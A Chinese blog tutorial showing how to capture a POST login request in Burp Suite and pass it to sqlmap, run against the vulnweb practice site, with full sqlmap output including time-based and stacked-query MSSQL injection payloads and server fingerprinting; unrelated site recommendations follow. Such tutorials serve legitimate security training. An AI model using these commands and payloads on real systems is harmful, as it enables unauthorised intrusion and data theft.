使用Burpsuite辅助Sqlmap进行POST注入测试章

我们在使用Sqlmap进行post型注入时,经常会出现请求遗漏导致注入失败的情况。

这里分享一个小技巧,即结合burpsuite来使用sqlmap,用这种方法进行post注入测试会更准确,操作起来也非常容易。

1. 浏览器打开目标地址http://testasp.vulnweb.com/Login.asp

2. 配置burp代理(127.0.0.1:8080)以拦截请求

3. 点击login表单的submit按钮

4. 如下图,这时候Burp会拦截到了我们的登录POST请求

5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下

6. 运行sqlmap并使用如下命令:./sqlmap.py -r search-test.txt -p tfUPass,这里参数 -r 是让sqlmap加载我们的post请求rsearch-test.txt,而-p 大家应该比较熟悉,指定注入用的参数。

./sqlmap.py-r search-test.txt-p tfUPass

sqlmap/0.9-automatic SQL injectionanddatabase takeover tool

http://sqlmap.sourceforge.net[*]starting at:13:26:52[13:26:52][INFO]parsing HTTP requestfrom'search-test.txt'[13:26:52][WARNING]the testable parameter'tfUPass'you providedisnotintothe GET[13:26:52][WARNING]the testable parameter'tfUPass'you providedisnotintotheCookie[13:26:52][INFO]using'/home/testuser/sqlmap/output/testasp.vulnweb.com/session'assession file[13:26:52][INFO]resuming injection datafromsession file[13:26:52][WARNING]thereisan injectioninPOST parameter'tfUName'but you didnotprovided itthistime[13:26:52][INFO]testing connection to the target url[13:26:53][INFO]testingifthe urlisstable,wait a few seconds[13:26:55][INFO]urlisstable[13:26:55][WARNING]heuristic test shows that POST parameter'tfUPass'mightnotbe injectable[13:26:55][INFO]testing sql injection on POST parameter'tfUPass'[13:26:55][INFO]testing'AND boolean-based blind - WHERE or HAVING clause'[13:27:02][INFO]testing'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[13:27:05][INFO]testing'PostgreSQL AND error-based - WHERE or HAVING clause'[13:27:07][INFO]testing'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[13:27:10][INFO]testing'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[13:27:12][INFO]testing'MySQL > 5.0.11 stacked queries'[13:27:14][INFO]testing'PostgreSQL > 8.1 stacked queries'[13:27:17][INFO]testing'Microsoft SQL Server/Sybase stacked queries'[13:27:30][INFO]POST parameter'tfUPass'is'Microsoft SQL Server/Sybase stacked queries'injectable[13:27:30][INFO]testing'MySQL > 5.0.11 AND time-based blind'[13:27:31][INFO]testing'PostgreSQL > 8.1 AND time-based blind'[13:27:31][INFO]testing'Microsoft SQL Server/Sybase time-based blind'[13:27:42][INFO]POST parameter'tfUPass'is'Microsoft SQL Server/Sybase time-based blind'injectable[13:27:42][INFO]testing'MySQL UNION query (NULL) - 1 to 10 columns'[13:27:48][INFO]testing'Generic UNION query (NULL) - 1 to 10 columns'[13:27:48][WARNING]usingunescaped version of the test because of zero knowledge of the back-endDBMS

sqlmap got a302redirect to/Search.asp-Whattarget addressdoyou want tousefromnow on?http://testasp.vulnweb.com:80/Login.asp (default) or provide another target address based also on the redirection got from the application>[13:27:58][INFO]target url appears to be UNION injectablewith2columns

POST parameter'tfUPass'isvulnerable.Doyou want to keep testing the others?[y/N]N

sqlmap identified the following injection pointswitha total of68HTTP(s)requests:---Place:POSTParameter:tfUPassType:stacked queriesTitle:MicrosoftSQLServer/Sybasestacked queriesPayload:tfUName=test&tfUPass=test'; WAITFOR DELAY '0:0:5';-- AND 'mPfC'='mPfCType:AND/OR time-based blindTitle:MicrosoftSQLServer/Sybasetime-based blindPayload:tfUName=test&tfUPass=test' WAITFOR DELAY '0:0:5'-- AND 'wpkc'='wpkc---[13:28:08][INFO]testingMySQL[13:28:09][WARNING]the back-endDBMSisnotMySQL[13:28:09][INFO]testingOracle[13:28:10][WARNING]the back-endDBMSisnotOracle[13:28:10][INFO]testingPostgreSQL[13:28:10][WARNING]the back-endDBMSisnotPostgreSQL[13:28:10][INFO]testingMicrosoftSQLServer[13:28:16][INFO]confirmingMicrosoftSQLServer[13:28:28][INFO]the back-endDBMSisMicrosoftSQLServerweb server operating system:Windows2003web application technology:ASP.NET,MicrosoftIIS6.0back-endDBMS:MicrosoftSQLServer2005[13:28:28][WARNING]HTTP error codes detected during testing:500(InternalServerError)-42times[13:28:28][INFO]Fetcheddata logged to text files under'/home/testuser/sqlmap/output/testasp.vulnweb.com'[*]shutting down at:13:28:28

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,732评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 87,496评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,264评论 0 338
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,807评论 1 277
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,806评论 5 368
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,675评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,029评论 3 399
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,683评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 41,704评论 1 299
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,666评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,773评论 1 332
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,413评论 4 321
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,016评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,978评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,204评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,083评论 2 350
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,503评论 2 343

推荐阅读更多精彩内容

  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 10,248评论 2 22
  • sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 2,031评论 0 5
  • 陆晨迎着记者走来。 他似乎听不到咔嚓咔嚓的快门声和记者所有尖锐的问题。一抹邪笑挂在唇边。 你们想知道什么?陆晨取下...
    落花已忘言阅读 379评论 0 1
  • 基本思想:在要排序的一组数中,对当前还未排好序的范围内的全部数,自上而下对相邻的两个数依次进行比较和调整,让较大的...
    liudai123阅读 155评论 0 0